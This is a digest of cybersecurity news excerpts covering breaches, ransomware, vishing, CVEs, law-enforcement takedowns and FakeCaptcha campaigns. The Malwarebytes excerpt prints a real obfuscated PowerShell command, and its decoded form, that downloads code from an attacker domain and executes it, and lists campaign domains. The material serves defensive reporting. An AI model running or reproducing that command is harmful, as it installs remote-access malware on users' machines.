EU launches EU-based, privacy-focused DNS resolution service
DNS4EU, an EU-based DNS resolution service created to strengthen European Union’s digital sovereignty, has become reality. What is DNS? The Domain Name System (DNS) “translates” human-readable domain names into IP addresses and back, and is essential for accessing websites. Most users use DNS resolver services provided by their internet service provider (because they are automatically configured) or a public DNS provider like Google or Cloudflare. DNS4EU is meant to be a resilient, fast, reliable, secure, privacy-friendly and EU-based alternative for those. The goal of DNS4EU DNS4EU is an initiative co-funded by the European Union and supported by the European Union Agency for Cybersecurity (ENISA), though the service is expected to be commercialised, “since it has to be sustainable without operational costs from the EU after 2025.” It is developed and managed by a consortium of private cybersecurity companies, CERTs, and academic institutions from 10 European Union countries, with Czech cybersecurity company Whalebone as its leader. “The DNS4EU initiative aligns with the EU’s strategic goal of enhancing its digital autonomy by providing an alternative to the existing public DNS services provided by non-european entities,” says the group.
Major food wholesaler says cyberattack impacting distribution systems
One of the largest food distributors in the U.S. reported a cyberattack to regulators on Monday, explaining that the incident has disrupted its operations and ability to fulfil customer orders. United Natural Foods released a public statement and filed documents with the U.S. Securities and Exchange Commission (SEC) saying the cyberattack began on June 5. The statement said the Rhode Island-based company identified unauthorized activity on its systems on Thursday, prompting officials to take systems offline. The action “has temporarily impacted the Company’s ability to fulfill and distribute customer orders.” “The incident has caused, and is expected to continue to cause, temporary disruptions to the Company’s business operations,” United Natural Foods said. “The Company has implemented workarounds for certain operations in order to continue servicing its customers where possible. The Company is continuing to work to restore its systems to safely bring them back online.” Law enforcement has been notified and the company said it has hired a cybersecurity firm to remediate the incident. The investigation into the attack “remains ongoing and is in its early stages.” The press statement published on Monday said the company is working closely with “customers, suppliers, and associates” to minimize the disruption. The company did not respond to requests for comment. United Natural Foods is the main supplier for Whole Foods and is considered the largest health and specialty food distributor in the United States and Canada. The company reported $8.2 billion in net sales last quarter.
Cybercriminals Are Hiding Malicious Web Traffic in Plain Sight
In an effort to evade detection, cybercriminals are increasingly turning to “residential proxy” services that cover their tracks by making it look like everyday online activity. For years, gray-market services known as “bulletproof” hosts have been a key tool for cybercriminals looking to anonymously maintain web infrastructure with no questions asked. But as global law enforcement scrambles to crack down on digital threats, they have developed strategies for getting customer information from these hosts and have increasingly targeted the people behind the services with indictments. At the cybercrime-focused conference Sleuthcon in in Arlington, Virginia, today, researcher Thibault Seret outlined how this shift has pushed both bulletproof hosting companies and criminal customers toward an alternative approach. Rather than relying on web hosts to find ways of operating outside law enforcement's reach, some service providers have turned to offering purpose-built VPNs and other proxy services as a way of rotating and masking customer IP addresses and offering infrastructure that either intentionally doesn't log traffic or mixes traffic from many sources together. And while the technology isn't new, Seret and other researchers emphasized to WIRED that the transition to using proxies among cybercrminals over the last couple of years is significant.
As AI and digital technologies advance, the European cyber threat landscape continues to evolve, presenting new challenges that require stronger partnerships and enhanced solutions. Ransomware groups and state-sponsored actors from Russia, China, Iran, and North Korea continue to grow in scope and sophistication, and European cyber protection cannot afford to stand still. That is why, today, in Berlin, we are announcing a new Microsoft initiative to expand our longstanding work to help defend Europe’s cybersecurity. Implementing one of the five European Digital Commitments I shared in Brussels five weeks ago, we are launching a new European Security Program that adds to the company’s longstanding global Government Security Program. This new program expands the geographic reach of our existing work and adds new elements that will become critical to Europe’s protection. It puts AI at the center of our work as a tool to protect traditional cybersecurity needs and strengthens our protection of digital and AI infrastructure. We are launching the European Security Program with three new elements: Increasing AI-based threat intelligence sharing with European governments; Making additional investments to strengthen cybersecurity capacity and resilience; and * Expanding our partnerships to disrupt cyberattacks and dismantle the networks cybercriminals us
The Cost of a Call: From Voice Phishing to Data Extortion
UNC6040 uses vishing to impersonate IT support, deceiving victims into granting access to their Salesforce instances. Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing) campaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion. Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements. This approach has proven particularly effective in tricking employees, often within English-speaking branches of multinational corporations, into actions that grant the attackers access or lead to the sharing of sensitive credentials, ultimately facilitating the theft of organization’s Salesforce data. In all observed cases, attackers relied on manipulating end users, not exploiting any vulnerability inherent to Salesforce. A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal. This application is often a modified version of Salesforce’s Data Loader, not authorized by Salesforce. During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version. This step inadvertently grants UNC6040 significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments. This methodology of abusing Data Loader functionalities via malicious connected apps is consistent with recent observations detailed by Salesforce in their guidance on protecting Salesforce environments from such threats. In some instances, extortion activities haven't been observed until several months after the initial UNC6040 intrusion activity, which could suggest that UNC6040 has partnered with a second threat actor that monetizes access to the stolen data. During these extortion attempts, the actor has claimed affiliation with the well-known hacking group ShinyHunters, likely as a method to increase pressure on their victims.
Hackers Leak 86 Million AT&T Records with Decrypted SSNs
Hackers leak data of 88 million AT&T customers with decrypted SSNs; latest breach raises questions about links to earlier Snowflake-related attack. Hackers have leaked what they claim is AT&T’s database which was reportedly stolen by the ShinyHunters group in April 2024 after they exploited major security flaws in the Snowflake cloud data platform. But is this really the Snowflake-linked data? We took a closer look. As seen by the Hackread.com research team, the data was first posted on a well-known Russian cybercrime forum on May 15, 2025. It was re-uploaded on the same forum on June 3, 2025, after which it began circulating among other hackers and forums. After analyzing the leaked data, we found it contains a detailed set of personal information. Each of these data points poses a serious privacy risk on its own, but together, they create full identity profiles that could be exploited for fraud or identity theft. The data includes: Full names Date of birth Phone numbers Email addresses Physical addresses 44 Million Social Security Numbers (SSN) (43,989,219 in total)
Hacker selling critical Roundcube webmail exploit as tech info disclosed
Hackers are actively exploiting CVE-2025-49113, a critical vulnerability in the widely used Roundcube open-source webmail application that allows remote execution. The security issue has been present in Roundcube for over a decade and impacts versions of Roundcube webmail 1.1.0 through 1.6.10. It received a patch on June 1st. It took attackers just a couple of days to reverse engineer the fix, weaponize the vulnerability, and start selling a working exploit on at least one hacker forum. Roundcube is one of the most popular webmail solutions as the product is included in offers from well-known hosting providers such as GoDaddy, Hostinger, Dreamhost, or OVH. "Email armageddon" CVE-2025-49113 is a post-authentication remote code execution (RCE) vulnerability that received a critical severity score of 9.9 out of 10 and is described as “email armageddon.” It was discovered and reported by Kirill Firsov, the CEO of the cybersecurity company FearsOff, who decided to publish the technical details before the end of the responsible disclosure period because an exploit had become available.
U.S. Government seizes approximately 145 criminal marketplace domains
The U.S. Attorney’s Office for the Eastern District of Virginia announced today the seizure of approximately 145 darknet and traditional internet domains, and cryptocurrency funds associated with the BidenCash marketplace. The operators of the BidenCash marketplace use the platform to simplify the process of buying and selling stolen credit cards and associated personal information. BidenCash commenced operations in March 2022. BidenCash administrators charged a fee for every transaction conducted on the website. The BidenCash marketplace had grown to support over 117,000 customers, facilitated the trafficking of over 15 million payment card numbers and personally identifiable information, and generated over $17 million in revenue during its operations. The BidenCash marketplace domains will no longer be operational and will be redirected to a U.S. law enforcement-controlled server, preventing future criminal activity on these sites. The marketplace also sold compromised credentials that could be used to access computers without proper authorization. Between October 2022 and February 2023, the BidenCash marketplace published 3.3 million individual stolen credit cards for free to promote the use of their services. The stolen data included credit card numbers, expiration dates, Card Verification Value (CVV) numbers, account holder names, addresses, email addresses, and phone numbers. According to court records, the United States obtained court authorization to seize cryptocurrency funds that BidenCash marketplace used to receive illicit proceeds from its illegal sales. Erik S. Siebert, U.S. Attorney for the Eastern District of Virginia; John Szydlik, Resident Agent in Charge of the U.S. Secret Service’s Frankfurt Resident Office; and Philip Russell, Acting Special Agent in Charge of the FBI Albuquerque Field Office, made the announcement. This case was investigated by the U.S. Secret Service’s Frankfurt Resident Office, the U.S. Secret Service’s Cyber Investigative Section, and the FBI Albuquerque Field Office. The Department of Justice thanks the Dutch National High Tech Crime Unit, The Shadowserver Foundation and Searchlight Cyber for their assistance with the investigation. The government is represented by Assistant U.S. Attorney Zoe Bedell in these matters.
Cisco warns of ISE and CCP flaws with public exploit code
Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions. The most severe of the three is a critical static credential vulnerability tracked as CVE-2025-20286, found by GMO Cybersecurity's Kentaro Kawane in Cisco ISE. This identity-based policy enforcement software provides endpoint access control and network device administration in enterprise environments. The vulnerability is due to improperly generated credentials when deploying Cisco ISE on cloud platforms, resulting in shared credentials across different deployments. Unauthenticated attackers can exploit it by extracting user credentials from Cisco ISE cloud deployments and using them to access installations in other cloud environments. However, as Cisco explained, threat actors can exploit this flaw successfully only if the Primary Administration node is deployed in the cloud. "A vulnerability in Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems," the company explained.
HuluCaptcha — An example of a FakeCaptcha framework
Hello and welcome back to another blog post. After some time of absence due to a lot of changes in my personal life ( finished university, started a new job, etc), I am happy to finally be able to present something new. Chapter 1: Captcha-verified Victim This story starts with a message by one of my long time internet contacts: Figure 1: Shit hit the Fan I assume, some of you can already tell from this message alone that something terrible had just happend to him. The legitimate website of the German Association for International Law had redirected him to an apparent Cloudflare Captcha site asking him to execute a Powershell command on device that does a Webrequest (iwr = Invoke-WebRequest) to a remote website (amoliera[.]com) and then pipes the response into “iex” which stands for Invoke-Expression. Thats a text-book example for a so called FakeCaptcha attack. For those of you that do not know what the FakeCaptcha attack technique is, let me give you a short primer: A Captcha in itself is a legitimate method Website Owners use to differentiate between bots (automated traffic) and real human users. It often involves at-least clicking a button but can additionally require the website visitor to solve different form of small tasks like clicking certain images out of a collection of random images or identifying a bunch of obscurely written letters. The goal is to only let users visit the website that are able to solve these tasks, which are often designed to be hard for computers but easy for human beings. Well, most of the times.
Akira doesn’t keep its promises to victims — SuspectFile
Over on SuspectFile, @amvinfe has been busy exposing Akira’s false promises to its victims. In two posts this week, he reports on what happened with one business in New Jersey and one in Germany that decided to pay Akira’s ransom demands. He was able to report on it all because Akira failed to secure its negotiations chat server. Anyone who knows where to look can follow along if a victim contacts Akira to try to negotiate any payment for a decryptor or data deletion. In one case, the victim paid Akira $200k after repeatedly asking for — and getting — assurances that this would all be kept confidential. In the second case, Akira demanded $6.9 million but eventually accepted that victim’s offer of $800k. The negotiations made clear that Akira had read the terms of the victim’s cyberinsurance policy and used that to calculate their demands. If the two victims hoped to keep their names or their breaches out of the news, they may have failed. Although SuspectFile did not name them, others with access to the chats might report on the incidents. Anyone who read the chats would possess the file lists of everything Akira claimed to have exfiltrated from each victim. Depending on their file-naming conventions, filenames may reveal proprietary or sensitive information and often reveal the name of the victim. So the take-home messages for current victims of Akira: Akira has not been keeping its negotiations with you secure and confidential. Paying Akira’s ransom demands is no guarantee that others will not obtain your data or find out about your breach. Even just negotiating with Akira may be sufficient to provide researchers and journalists with data you do not want shared. If you pay Akira and they actually give you accurate information about how they gained access and elevated privileges, you are now more at risk from other attackers while you figure out how to secure your network.
Victims risk AsyncRAT infection after being redirected to fake Booking.com sites
We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT. Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers. The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days. Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device. fake Captcha fake Captcha prompt As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard. Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals. instructions for the visitor instructions to infect your own device If you’re using Chrome, you may see this warning: Chrome warns but for what? Chrome issues a warning but it may the danger may be unclear to users The warning is nice, but it’s not very clear what this warning is for, in my opinion. Users of Malwarebytes’ Browser Guard will see this warning: Browser Guard clipboard warning Malwarebytes Browser Guard’s clipboard warning “Hey, did you just copy something? Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.” Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow. What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger. pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v" The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is: powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv" The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves. Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT. Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT. The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft. IOCs The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones. (booking.)chargesguestescenter[.]com (booking.)badgustrewivers.com[.]com (booking.)property-paids[.]com (booking.)rewiewqproperty[.]com (booking.)extranet-listing[.]com (booking.)guestsalerts[.]com (booking.)gustescharge[.]com kvhandelregis[.]com patheer-moreinfo[.]com guestalerthelp[.]com rewiewwselect[.]com hekpaharma[.]com bkngnet[.]com partnervrft[.]com
International operation results in arrest of 22 men in Nigeria for sextortion | Australian Federal Police
The AFP has played a key role in a landmark international operation targeting perpetrators of online sextortion, which resulted in the arrest of 22 suspects in Nigeria. CORRECTION: The arrest of two Nigerian-based offenders linked to the suicide of a 16-year-old child in New South Wales in 2023 was NOT part of Operation Artemis. Those arrests occurred after Operation Artemis, when they were conducted by Nigeria’s Economic and Financial Crimes Commission to assist a NSW Police Force investigation. The AFP has played a key role in a landmark international operation targeting perpetrators of online sextortion, which resulted in the arrest of 22 suspects in Nigeria. Operation Artemis was a joint operation led by the US Federal Bureau of Investigation in partnership with the AFP, Royal Canadian Mounted Police, and Nigeria’s Economic and Financial Crimes Commission (EFCC). It focused on dismantling an organised criminal network allegedly responsible for a wave of online sextortion crimes which targeted thousands of teenagers globally. The network’s scheme, which coerced victims into sharing sexually explicit images before threatening to distribute those images unless payment was made, had devastating consequences. In the United States alone, more than 20 teenage suicides have been linked to sextortion-related cases since 2021. While many victims were based in North America, the ripple effects of the offending extended to Australia and other nations.
Malaysian home minister’s WhatsApp hacked, used to scam contacts
The hack into the account of the country’s top security official has drawn criticism online. Malaysia’s home minister had his WhatsApp account hacked and then abused to send malicious links to his contacts, according to police. The attacker reportedly used a virtual private network (VPN) to compromise the account of Datuk Seri Saifuddin Nasution Ismail, authorities said at a press conference on Friday, adding that no victims have reported financial losses so far. They did not elaborate on how the hack was carried out. The Ministry of Home Affairs, which oversees law enforcement, immigration and censorship, confirmed the incident and urged the public not to respond to any messages or calls claiming to be from the minister, especially those involving financial or personal requests. The breach is under investigation and law enforcement is working to determine the hacker’s location. Mobile phishing scams have become increasingly common in Malaysia. Local media have reported that citizens are frequently targeted by fraudsters posing as police, bank officials or court representatives. The recent WhatsApp incident follows similar attacks on other high-ranking officials. In March, scammers hijacked the WhatsApp account of parliamentary speaker Johari Abdul and tricked some of his contacts into sending money. In 2022, threat actors accessed Telegram and Signal accounts belonging to former Prime Minister Ismail Sabri. And in 2015, hackers took over the Royal Malaysia Police’s Twitter and Facebook accounts, posting pro-Islamic State group messages. Nasution Ismail faced online criticism and ridicule following the WhatsApp hack, with local media reporting that citizens questioned the strength of Malaysia’s cybersecurity measures, given that the country’s top security official had been successfully targeted by hackers.
Vanta bug exposed customers' data to other customers | TechCrunch
The compliance company said the customer data exposure was caused by a product change. ompliance company Vanta has confirmed that a bug exposed the private data of some of its customers to other Vanta customers. The company told TechCrunch that the data exposure was a result of a product code change and not caused by an intrusion. Vanta, which helps corporate customers automate their security and compliance processes, said it identified an issue on May 26 and that remediation will complete June 4. The incident resulted in “a subset of data from fewer than 20% of our third-party integrations being exposed to other Vanta customers,” according to the statement attributed to Vanta’s chief product officer Jeremy Epling. Epling said fewer than 4% of Vanta customers were affected, and have all been notified. Vanta has more than 10,000 customers, according to its website, suggesting the data exposure likely affects hundreds of Vanta customers. One customer affected by the incident told TechCrunch that Vanta had notified them of the data exposure. The customer said Vanta told them that “employee account data was erroneously pulled into your Vanta instance, as well as out of your Vanta instance into other customers’ instances.”
Algerian ��Jabaroot’ Group Behind CNSS Breach Attacks Moroccan Property Registry
The Moroccan National Agency for Land Conservation, Cadastre and Cartography (ANCFCC) has become the latest victim of a major cyberattack claimed by “Jabaroot,” the same hacker group behind April’s CNSS breach. The group, which identifies itself as Algerian, announced the attack on Monday, allegedly resulting in the theft and subsequent leak of thousands of sensitive property documents. According to claims the group made on their Telegram channel, the hackers have exfiltrated and released what they describe as “a massive amount of sensitive data” from ANCFCC’s databases. The leaked information reportedly includes 10,000 property ownership certificates out of a total database of more than 10 million land titles. The compromised data allegedly contains cadastral information, property owner identities, real estate references, and various personal and administrative documents.
Thousands Hit by The North Face Credential Stuffing Attack
Sports apparel and footwear giant VF Corporation is notifying over 2,800 individuals that their personal information was compromised in a recent credential stuffing attack aimed at The North Face website. Credential stuffing occurs when threat actors leverage email addresses, usernames, and passwords compromised in a previous data breach to access accounts on a different online service where the same credentials have been used. According to notification letters VF Corporation sent this week to the impacted individuals, copies of which were submitted to multiple regulators, a threat actor employed this technique on April 23 against a small set of user accounts on thenorthface.com website. “Based on our investigation, we believe that the attacker previously gained access to your email address and password from another source (not from us) and then used those same credentials to access your account on our website,” the company’s notification letter reads. VF Corporation says it discovered the suspicious activity on the same day, and informed the Maine Attorney General’s Office that a total of 2,861 user accounts were compromised. The campaign resulted in the attackers gaining access to the information stored in the compromised accounts, such as names, addresses, email addresses, dates of birth, phone numbers, user preferences, and details on the items purchased on the website. The company underlines that payment card information was not compromised because it does not store such data on its website. “We only retain a ‘token’ linked to your payment card, and only our third-party payment card processor keeps payment card details. The token cannot be used to initiate a purchase anywhere other than on our website. Accordingly, your credit card information is not at risk as a result of this incident,” it says.
Derzeit sind E-Mails mit einem gefälschten Absender namens «Kanton Schaffhausen» im Umlauf. In der Mail wird eine Rückerstattung versprochen. Der enthaltene Link führt zum Download von einer Software, die die Fernsteuerung Ihres Computers ermöglicht. Diese E-Mails sind gefälscht und stammen nicht vom Kanton Schaffhausen. Was Sie tun sollten: Folgen Sie keinesfalls den darin enthaltenen Instruktionen Löschen Sie die Mail und markieren Sie die Mail als Spam Falls Sie den Link bereits angeklickt haben und die Software zur Fernsteuerung Ihres Computers installiert wurde: 1. Entfernen Sie die installierte Software und setzen Sie den Computer frisch auf. 2. Ändern Sie sofort Ihre Passwörter. Überprüfen Sie, ob Ihre E-Mail-Adresse und Passwörter bereits in falsche Hände geraten oder im Internet missbraucht worden sind: https://www.ibarry.ch/de/sicherheits-checks 3. Beobachten Sie Ihr Bankkonto und kontaktieren Sie bei Verdacht Ihre Bank. Vor allem wenn Sie mit diesem Computer in der Zwischenzeit auf Ihr Bankkonto zugegriffen haben. 4. Melden Sie den Vorfall (freiwillig) beim Bundesamt für Cybersicherheit BACS: https://www.report.ncsc.admin.ch/ 5. Reichen Sie online eine Strafanzeige bei der Polizei ein:https://www.suisse-epolice.ch, falls sie geschädigt wurden. 6. Schauen Sie sich die Tipps und Infos rund um Phishing und Cybersicherheit auf: https://www.s-u-p-e-r.ch
Google on Monday released a fresh Chrome 137 update to address three vulnerabilities, including a high-severity bug exploited in the wild. Tracked as CVE-2025-5419, the zero-day is described as an out-of-bounds read and write issue in the V8 JavaScript engine. “Google is aware that an exploit for CVE-2025-5419 exists in the wild,” the internet giant’s advisory reads. No further details on the security defect or the exploit have been provided. However, the company credited Clement Lecigne and Benoît Sevens of Google Threat Analysis Group (TAG) for reporting the issue. TAG researchers previously reported multiple vulnerabilities exploited by commercial surveillance software vendors, including such bugs in Chrome. Flaws in Google’s browser are often exploited by spyware vendors and CVE-2025-5419 could be no different. According to a NIST advisory, the exploited zero-day “allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page”. It should be noted that the exploitation of out-of-bounds defects often leads to arbitrary code execution. The latest browser update also addresses CVE-2025-5068, a medium-severity use-after-free in Blink that earned the reporting researcher a $1,000 bug bounty. No reward will be handed out for the zero-day. The latest Chrome iteration is now rolling out as version 137.0.7151.68/.69 for Windows and macOS, and as version 137.0.7151.68 for Linux.
Announcing a new strategic collaboration to bring clarity to threat actor naming | Microsoft Security Blog
Microsoft and CrowdStrike are teaming up to create alignment across our individual threat actor taxonomies to help security professionals connect insights faster. In today’s cyberthreat landscape, even seconds of delay can mean the difference between stopping a cyberattack or falling victim to ransomware. One major cause of delayed response is understanding threat actor attribution, which is often slowed by inaccurate or incomplete data as well as inconsistencies in naming across platforms. This, in turn, can reduce confidence, complicate analysis, and delay response. As outlined in the National Institute of Standards and Technology’s (NIST) guidance on threat sharing (SP 800-1501), aligning how we describe and categorize cyberthreats can improve understanding, coordination, and overall security posture. That’s why we are excited to announce that Microsoft and CrowdStrike are teaming up to create alignment across our individual threat actor taxonomies. By mapping where our knowledge of these actors align, we will provide security professionals with the ability to connect insights faster and make decisions with greater confidence. Read about Microsoft and Crowdstrike’s joint threat actor taxonomy Names are how we make sense of the threat landscape and organize insights into known or likely cyberattacker behaviors. At Microsoft, we’ve published our own threat actor naming taxonomy to help researchers and defenders identify, share, and act on our threat intelligence, which is informed by the 84 trillion threat signals that we process daily. But the same actor that Microsoft refers to as Midnight Blizzard might be referred to as Cozy Bear, APT29, or UNC2452 by another vendor. Our mutual customers are always looking for clarity. Aligning the known commonalities among these actor names directly with peers helps to provide greater clarity and gives defenders a clearer path to action. Introducing a collaborative reference guide to threat actors Microsoft and CrowdStrike are publishing the first version of our joint threat actor mapping. It includes: A list of common actors tracked by Microsoft and CrowdStrike mapped by their respective taxonomies. Corresponding aliases from each group’s taxonomy. This reference guide serves as a starting point, a way to translate across naming systems so defenders can work faster and more efficiently, especially in environments where insights from multiple vendors are in play. This reference guide helps to: Improve confidence in threat actor identification. Streamline correlation across platforms and reports. Accelerate defender action in the face of active cyberthreats. This effort is not about creating a single naming standard. Rather, it’s meant to help our customers and the broader security community align intelligence more easily, respond faster, and stay ahead of threat actors.
50,000+ Azure AD Users Exposed via Unsecured API: BeVigil Uncovers Critical Flaw | CloudSEK
An unsecured API endpoint buried inside a JavaScript file gave attackers the keys to the kingdom—direct access to sensitive Microsoft Graph data of thousands of employees, including top executives. CloudSEK’s BeVigil platform uncovered how this silent slip could lead to identity theft, phishing attacks, and regulatory nightmares. Here’s how it unfolded—and what your organization must do to stay safe. CloudSEK’s BeVigil platform recently identified a critical security lapse on a publicly accessible of an aviation giant. The vulnerability stemmed from an exposed JavaScript file that contained an unauthenticated API endpoint. This endpoint granted access tokens to Microsoft Graph with elevated privileges, ultimately leading to unauthorized exposure of sensitive data belonging to more than 50,000 Azure AD users. What Went Wrong BeVigil’s API Scanner found that a JavaScript bundle with subdomain included on a hardcoded endpoint that was being accessed without authentication. This endpoint issued a Microsoft Graph API token with excessive permissions, specifically User.Read.All and AccessReview.Read.All. These permissions are typically restricted due to their ability to access full user profiles and critical identity governance data. Using this token, an attacker could query Microsoft Graph endpoints to retrieve detailed employee information, including names, job titles, contact details, reporting structures, and even access review configurations. Such exposure not only undermines user privacy but also opens the door to privilege escalation, identity theft, and targeted phishing campaigns, especially since executive-level data was also exposed. Scale and Severity The impact is far-reaching. Data associated with over 50,000 users was accessible, and the endpoint continued to return records for newly added users. Among the exposed information were personal identifiers, user principal names, access role assignments, and other governance details. The exposure of this magnitude significantly increases the organization’s attack surface and introduces compliance risks under frameworks such as GDPR and CCPA. Security and Compliance Implications Unauthorized Data Access: Attackers could exploit the API to retrieve confidential employee records directly from Azure AD. Token Misuse: The leaked token could grant unrestricted visibility into internal directory structures and governance decisions. Snapshot of the Generated Authorization Token Executive Exposure: The data of senior leadership was accessible, making them high-value targets for impersonation or social engineering. Regulatory Violations: The exposure of personally identifiable information without proper safeguards raises serious compliance concerns. Data breaches erode user trust and can lead to long-term reputational harm and operational disruption. Recommended Remediations BeVigil suggested that following actions are implemented on priority: Disable Public API Access: Restrict the vulnerable endpoint and enforce strict authentication controls. Revoke Compromised Tokens: Invalidate exposed tokens and rotate affected credentials. Enforce Least Privilege: Review and limit token scopes to only what is necessary. Monitor API Usage: Implement logging and alerting to detect abnormal Microsoft Graph activity. Secure Front-End Code: Avoid embedding sensitive endpoints or token logic in client-side scripts. Review Permissions and Roles: Audit all Azure AD roles and access reviews to eliminate overprovisioned permissions. Implement Rate Limiting: Protect API endpoints with rate controls and anomaly detection.
Official Root Cause Analysis (RCA) for SentinelOne Global Service Interruption
On May 29, 2025, SentinelOne experienced a global service disruption affecting multiple customer-facing services. During this period, customer endpoints remained protected, but security teams were unable to access the management console and related services, which significantly impacted their ability to manage their security operations and access important data. We apologize for the disruption caused by this service interruption. The root cause of the disruption was a software flaw in an infrastructure control system that removed critical network routes, causing widespread loss of network connectivity within the SentinelOne platform. It was not a security-related event. The majority of SentinelOne services experienced full or partial downtime due to this sudden loss of network connectivity to critical components in all regions. We’d like to assure our commercial customers that their endpoints were protected throughout the duration of the service disruption and that no SentinelOne security data was lost during the event. Protected endpoint systems themselves did not experience downtime due to this incident. A core design principle of the SentinelOne architecture is to ensure protection and prevention capabilities continue uninterrupted without constant cloud connectivity or human dependency for detection and response – even in the case of service interruptions, of any kind, including events like this one.
CVE-2025-32756: Fortinet RCE Exploited in the Wild
On May 13, 2025, FortiGuard Labs published an advisory detailing CVE-2025-32756, which affects a variety of Fortinet products: FortiCamera FortiMail FortiNDR FortiRecorder FortiVoice In their advisory, FortiGuard Labs states that Fortinet has observed this issue being exploited in the wild. The next day, May 14, the vulnerability was added to the CISA KEV catalog. The vulnerability is described in the advisory as a stack-based buffer overflow in the administrative API that can lead to unauthenticated remote code execution. Given that it’s being exploited in the wild, we figured we’d take a closer look. If you’d rather run the test instead of reading this write-up, coverage is already available in NodeZero.
Hidden Bear: The GRU hackers of Russia’s most notorious kill squad
Russian GRU Unit 29155 is best known for its long list of murder and sabotage ops, which include the Salisbury poisonings in England, arms depot explosions in Czechia, and an attempted coup d’etat in Montenegro. But its activities in cyberspace remained in the shadows — until now. After reviewing a trove of hidden data, The Insider can report that the Kremlin’s most notorious black ops squad also fielded a team of hackers — one that attempted to destabilize Ukraine in the months before Russia’s full-scale invasion. For members of Russia’s most notorious black ops unit, they look like children. Even their photographs on the FBI’s “wanted” poster show a group of spies born around the time Vladimir Putin came to power in Russia. But then, hacking is a young man’s business. In August 2024, the U.S. Justice Department indicted Vladislav Borovkov, Denis Denisenko, Dmitriy Goloshubov, Nikolay Korchagin, Amin Stigal and Yuriy Denisov for conducting “large-scale cyber operations to harm computer systems in Ukraine prior to the 2022 Russian invasion,” using malware to wipe data from systems connected to Ukraine’s critical infrastructure, emergency services, even its agricultural industry, and masking their efforts as plausibly deniable acts of “ransomware” – digital blackmail. Their campaign was codenamed “WhisperGate.” The hackers posted the personal medical data, criminal records, and car registrations of untold numbers of Ukrainians. The hackers also probed computer networks “associated with twenty-six NATO member countries, searching for potential vulnerabilities” and, in October 2022, gained unauthorized access to computers linked to Poland’s transportation sector, which was vital for the inflow and outflow of millions of Ukrainians – and for the transfer of crucial Western weapons systems to Kyiv. More newsworthy than the superseding indictment of this sextet of hackers was the organization they worked for: Unit 29155 of Russia’s Main Intelligence Directorate of the General Staff, or GRU. In the past decade and a half, this elite team of operatives has been responsible for the Novichok poisonings of Russian ex-spy Sergei Skripal and Bulgarian arms manufacturer Emilian Gebrev, an abortive coup in Montenegro, and a series of explosions of arms and ammunition depots in Bulgaria and Czechia. Unit 29155 is Russia’s kill and sabotage squad. But now they were being implicated for the first time as state hackers. Moreover, the U.S. government made a compelling case that Unit 29155 was engaged in cyber attacks designed to destabilize Ukraine in advance of Russian tanks and soldiers stealing across the border – if this were true, it would mean that at least one formidable arm of Russian military intelligence knew about a war that other Russian special services were famously kept in the dark about. This hypothesis is consistent with prior findings by The Insider showing that members of 29155 were deployed into Ukraine a few days before the full-scale invasion.
Google Online Security Blog: Sustaining Digital Certificate Security - Upcoming Changes to the Chrome Root Store
